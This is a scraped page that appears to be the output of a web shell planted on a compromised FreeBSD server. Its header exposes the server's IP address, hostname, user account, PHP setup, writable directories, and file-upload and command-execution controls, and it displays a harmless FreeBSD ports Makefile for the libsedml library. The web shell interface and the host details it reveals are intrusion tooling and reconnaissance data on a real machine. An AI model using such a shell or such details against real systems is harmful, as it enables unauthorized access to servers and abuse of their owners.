403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/biology/libsedml/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/biology/libsedml/Makefile
PORTNAME=	libsedml
DISTVERSIONPREFIX=	v
DISTVERSION=	2.0.32
CATEGORIES=	biology devel

MAINTAINER=	yuri@FreeBSD.org
COMMENT=	C++ SED-ML library
WWW=		https://github.com/fbergmann/libSEDML

LICENSE=	BSD2CLAUSE
LICENSE_FILE=	${WRKSRC}/LICENSE.txt

BUILD_DEPENDS=	libsbml>0:biology/libsbml \
		libnuml>0:biology/libnuml # statically linked, even into a shared library, see https://github.com/fbergmann/libSEDML/issues/155
RUN_DEPENDS=	libsbml>0:biology/libsbml \
		libnuml>0:biology/libnuml # when static lib libnuml.a is fixed these should be run-time dependency

USES=		cmake compiler:c++11-lang gnome
USE_GNOME=	libxml2
USE_LDCONFIG=	yes

USE_GITHUB=	yes
GH_ACCOUNT=	fbergmann
GH_PROJECT=	libSEDML

post-install:
	# no need to install LICENSE, README, VERSION
	@${RM} -r ${STAGEDIR}${DATADIR}
	# workaround for https://github.com/fbergmann/libSEDML/issues/163
	${RM} -r ${STAGEDIR}${PREFIX}/share/cmake

# the project builds static libs with -fPIC, see https://github.com/fbergmann/libSEDML/issues/155

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit